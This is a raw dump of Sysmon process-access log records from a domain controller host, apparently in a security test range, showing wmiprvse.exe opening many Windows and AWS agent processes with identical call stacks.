15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024425Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024424Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024423Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024422Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024421Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024420Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024419Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024418Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024417Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024416Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024415Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024414Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024413Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024412Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024411Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024410Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024409Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024408Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024407Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024406Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 